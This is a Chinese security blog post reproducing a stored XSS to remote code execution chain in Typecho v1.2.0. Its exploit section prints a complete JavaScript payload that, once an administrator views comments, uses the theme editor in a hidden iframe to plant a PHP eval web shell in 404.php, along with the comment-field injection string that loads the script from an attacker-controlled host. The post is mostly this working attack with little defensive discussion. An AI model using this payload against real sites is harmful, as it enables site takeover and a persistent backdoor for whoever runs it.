<!DOCTYPE html>
<html lang="zh-cn">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/wan1/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/wan1/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/wan1/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/wan1/images/logo.svg" color="#222">

<link rel="stylesheet" href="/wan1/css/main.css">


<link rel="stylesheet" href="/wan1/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"wanheiqiyihu.gitee.io","root":"/wan1/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="【漏洞复现】Typecho v1.2.0 rce复现1https:&#x2F;&#x2F;github.com&#x2F;typecho&#x2F;typecho&#x2F;releases&#x2F;tag&#x2F;v1.2.0  环境搭建最新版本是v1.2.1，存在漏洞的版本为v1.2.0 通过上面的链接将环境下载下来，然后放在目录下面开phpstudy就可以了。 然后直接install.php安装就可以了。  然后就是正常安装就可以了。 漏洞复现在评论处的网">
<meta property="og:type" content="article">
<meta property="og:title" content="【漏洞复现】Typecho v1.2.0 rce复现">
<meta property="og:url" content="https://wanheiqiyihu.gitee.io/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="十三の博客">
<meta property="og:description" content="【漏洞复现】Typecho v1.2.0 rce复现1https:&#x2F;&#x2F;github.com&#x2F;typecho&#x2F;typecho&#x2F;releases&#x2F;tag&#x2F;v1.2.0  环境搭建最新版本是v1.2.1，存在漏洞的版本为v1.2.0 通过上面的链接将环境下载下来，然后放在目录下面开phpstudy就可以了。 然后直接install.php安装就可以了。  然后就是正常安装就可以了。 漏洞复现在评论处的网">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416133151360.png">
<meta property="og:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416133733737.png">
<meta property="og:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416133759135.png">
<meta property="og:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416134049273.png">
<meta property="og:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416134103297.png">
<meta property="og:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416134613324.png">
<meta property="og:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416134718786.png">
<meta property="og:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416135209940.png">
<meta property="og:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416135519689.png">
<meta property="og:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416135538141.png">
<meta property="og:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416141532736.png">
<meta property="og:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416141605362.png">
<meta property="article:published_time" content="2023-04-16T06:23:18.000Z">
<meta property="article:modified_time" content="2023-04-16T06:43:44.408Z">
<meta property="article:author" content="十三">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416133151360.png">

<link rel="canonical" href="https://wanheiqiyihu.gitee.io/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-cn'
  };
</script>

  <title>【漏洞复现】Typecho v1.2.0 rce复现 | 十三の博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/wan1/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">十三の博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/wan1/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/wan1/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-ctf做题笔记">

    <a href="/wan1/categories/Experience" rel="section"><i class="download fa-fw"></i>CTF做题笔记</a>

  </li>
        <li class="menu-item menu-item-python">

    <a href="/wan1/categories/python" rel="section"><i class="download fa-fw"></i>python</a>

  </li>
        <li class="menu-item menu-item-java">

    <a href="/wan1/categories/java" rel="section"><i class="download fa-fw"></i>java</a>

  </li>
        <li class="menu-item menu-item-读书笔记">

    <a href="/wan1/categories/readbook" rel="section"><i class="download fa-fw"></i>读书笔记</a>

  </li>
        <li class="menu-item menu-item-渗透测试">

    <a href="/wan1/categories/penetration" rel="section"><i class="download fa-fw"></i>渗透测试</a>

  </li>
        <li class="menu-item menu-item-基础">

    <a href="/wan1/categories/basic" rel="section"><i class="download fa-fw"></i>基础</a>

  </li>
        <li class="menu-item menu-item-轮子">

    <a href="/wan1/categories/lunzi" rel="section"><i class="download fa-fw"></i>轮子</a>

  </li>
        <li class="menu-item menu-item-漏洞库">

    <a href="/wan1/categories/fuxian" rel="section"><i class="download fa-fw"></i>漏洞库</a>

  </li>
        <li class="menu-item menu-item-工具">

    <a href="/wan1/categories/tools" rel="section"><i class="download fa-fw"></i>工具</a>

  </li>
        <li class="menu-item menu-item-代码审计">

    <a href="/wan1/categories/daima" rel="section"><i class="download fa-fw"></i>代码审计</a>

  </li>
        <li class="menu-item menu-item-逆向">

    <a href="/wan1/categories/nixiang" rel="section"><i class="download fa-fw"></i>逆向</a>

  </li>
        <li class="menu-item menu-item-应急响应">

    <a href="/wan1/categories/yingji" rel="section"><i class="download fa-fw"></i>应急响应</a>

  </li>
        <li class="menu-item menu-item-免杀">

    <a href="/wan1/categories/miansha" rel="section"><i class="download fa-fw"></i>免杀</a>

  </li>
        <li class="menu-item menu-item-靶场">

    <a href="/wan1/categories/bachang" rel="section"><i class="download fa-fw"></i>靶场</a>

  </li>
        <li class="menu-item menu-item-cve申请">

    <a href="/wan1/categories/cve" rel="section"><i class="download fa-fw"></i>cve申请</a>

  </li>
        <li class="menu-item menu-item-c语言">

    <a href="/wan1/categories/c" rel="section"><i class="download fa-fw"></i>c语言</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-cn">
    <link itemprop="mainEntityOfPage" href="https://wanheiqiyihu.gitee.io/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/wan1/images/avatar.gif">
      <meta itemprop="name" content="十三">
      <meta itemprop="description" content="潜心学习，不骄不躁">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="十三の博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          【漏洞复现】Typecho v1.2.0 rce复现
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2023-04-16 14:23:18 / 修改时间：14:43:44" itemprop="dateCreated datePublished" datetime="2023-04-16T14:23:18+08:00">2023-04-16</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/wan1/categories/fuxian/" itemprop="url" rel="index"><span itemprop="name">-fuxian</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="【漏洞复现】Typecho-v1-2-0-rce复现"><a href="#【漏洞复现】Typecho-v1-2-0-rce复现" class="headerlink" title="【漏洞复现】Typecho v1.2.0 rce复现"></a>【漏洞复现】Typecho v1.2.0 rce复现</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/typecho/typecho/releases/tag/v1.2.0</span><br></pre></td></tr></table></figure>

<h1 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h1><p>最新版本是v1.2.1，存在漏洞的版本为v1.2.0</p>
<p>通过上面的链接将环境下载下来，然后放在目录下面开phpstudy就可以了。</p>
<p>然后直接install.php安装就可以了。</p>
<p><img src="/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416133151360.png" alt="image-20230416133151360"></p>
<p>然后就是正常安装就可以了。</p>
<h1 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h1><p>在评论处的网站框插入POC</p>
<p><img src="/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416133733737.png" alt="image-20230416133733737"></p>
<p>成功触发xss</p>
<p><img src="/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416133759135.png" alt="image-20230416133759135"></p>
<p>在后台的那个/admin/index.php登录进去，查看评论。</p>
<p><img src="/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416134049273.png" alt="image-20230416134049273"></p>
<p>成功触发xss</p>
<p><img src="/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416134103297.png" alt="image-20230416134103297"></p>
<h2 id="rce"><a href="#rce" class="headerlink" title="rce"></a>rce</h2><p>rce需要远程加载以下js文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">function step1()&#123; var data2=&quot;&lt;iframe id=\&quot;testxss\&quot; src=\&quot;/admin/theme-editor.php?theme=default&amp;file=404.php\&quot; width=\&quot;0%\&quot; height=\&quot;0%\&quot; onload=\&quot;poc()\&quot;&gt;&lt;/iframe&gt;&quot;; var oldata=document.body.innerHTML; document.body.innerHTML=(oldata+data2); &#125;</span><br><span class="line"></span><br><span class="line">var times=0; var g_shell=0; function poc()&#123; if(times&lt;=10)&#123; var htmldata=document.getElementById(&#x27;testxss&#x27;).contentWindow.document.getElementById(&#x27;content&#x27;); var btn=document.getElementById(&#x27;testxss&#x27;).contentWindow.document.getElementsByTagName(&#x27;button&#x27;); olddatas=htmldata.innerText; htmldata.innerText=(&#x27;&lt;?php @eval($_GET[&quot;cookie&quot;])?&gt;\n&#x27;)+olddatas; btn[1].click(); times+=1; if(g_shell==1)&#123; var xhr1=new XMLHttpRequest(); xhr1.open(&#x27;get&#x27;,&#x27;/usr/themes/default/404.php?shell=1&#x27;); xhr1.send(); &#125; else&#123; return 0; &#125; &#125; &#125; step1();</span><br></pre></td></tr></table></figure>

<p>将这个js部署到其他的web服务器上面去。</p>
<p><img src="/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416134613324.png" alt="image-20230416134613324"></p>
<p>在评论处的网站框插入POC</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://xxx.xxx.com/&quot;&gt;&lt;/a&gt;&lt;script/src=http://vpsip/rce.js&gt;&lt;/script&gt;&lt;a/href=&quot;#</span><br></pre></td></tr></table></figure>

<p><img src="/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416134718786.png" alt="image-20230416134718786"></p>
<p>提交完毕之后发现服务器那边已经被访问了</p>
<p><img src="/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416135209940.png" alt="image-20230416135209940"></p>
<p>但是现在是游客，没有权限去修改，需要利用管理员的身份来对404.php文件进行编辑</p>
<p>登录后台进行管理评论，页面有短暂的转圈</p>
<p><img src="/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416135519689.png" alt="image-20230416135519689"></p>
<p>服务器的js文件又被请求了</p>
<p><img src="/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416135538141.png" alt="image-20230416135538141"></p>
<p><img src="/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416141532736.png" alt="image-20230416141532736"></p>
<p>成功更改</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\usr\themes\default\404.php</span><br></pre></td></tr></table></figure>

<p><img src="/wan1/wan1/2023/04/16/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0/image-20230416141605362.png" alt="image-20230416141605362"></p>
<p>成功。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/wan1/2023/04/15/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%A6%85%E9%81%93%E9%A1%B9%E7%9B%AE%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%EF%BC%88RCE%EF%BC%89/" rel="prev" title="【漏洞复现】禅道项目管理系统存在远程命令执行漏洞（RCE）">
      <i class="fa fa-chevron-left"></i> 【漏洞复现】禅道项目管理系统存在远程命令执行漏洞（RCE）
    </a></div>
      <div class="post-nav-item">
    <a href="/wan1/2023/04/19/pc%E7%AB%AF%E5%BE%AE%E4%BF%A1%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF%E4%B8%8E%E8%81%8A%E5%A4%A9%E8%AE%B0%E5%BD%95%E5%8F%96%E8%AF%81/" rel="next" title="pc端微信个人信息与聊天记录取证">
      pc端微信个人信息与聊天记录取证 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typecho-v1-2-0-rce%E5%A4%8D%E7%8E%B0"><span class="nav-number">1.</span> <span class="nav-text">【漏洞复现】Typecho v1.2.0 rce复现</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">2.</span> <span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-number">3.</span> <span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#rce"><span class="nav-number">3.1.</span> <span class="nav-text">rce</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="十三"
      src="/wan1/images/avatar.gif">
  <p class="site-author-name" itemprop="name">十三</p>
  <div class="site-description" itemprop="description">潜心学习，不骄不躁</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/wan1/archives/">
        
          <span class="site-state-item-count">172</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">十三</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/wan1/lib/anime.min.js"></script>
  <script src="/wan1/lib/velocity/velocity.min.js"></script>
  <script src="/wan1/lib/velocity/velocity.ui.min.js"></script>

<script src="/wan1/js/utils.js"></script>

<script src="/wan1/js/motion.js"></script>


<script src="/wan1/js/schemes/pisces.js"></script>


<script src="/wan1/js/next-boot.js"></script>




  




  
<script src="/wan1/js/local-search.js"></script>













  

  

<script src="/wan1/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"live2d-widget-model-tsumiki"},"display":{"position":"right","width":300,"height":600},"mobile":{"show":true},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>
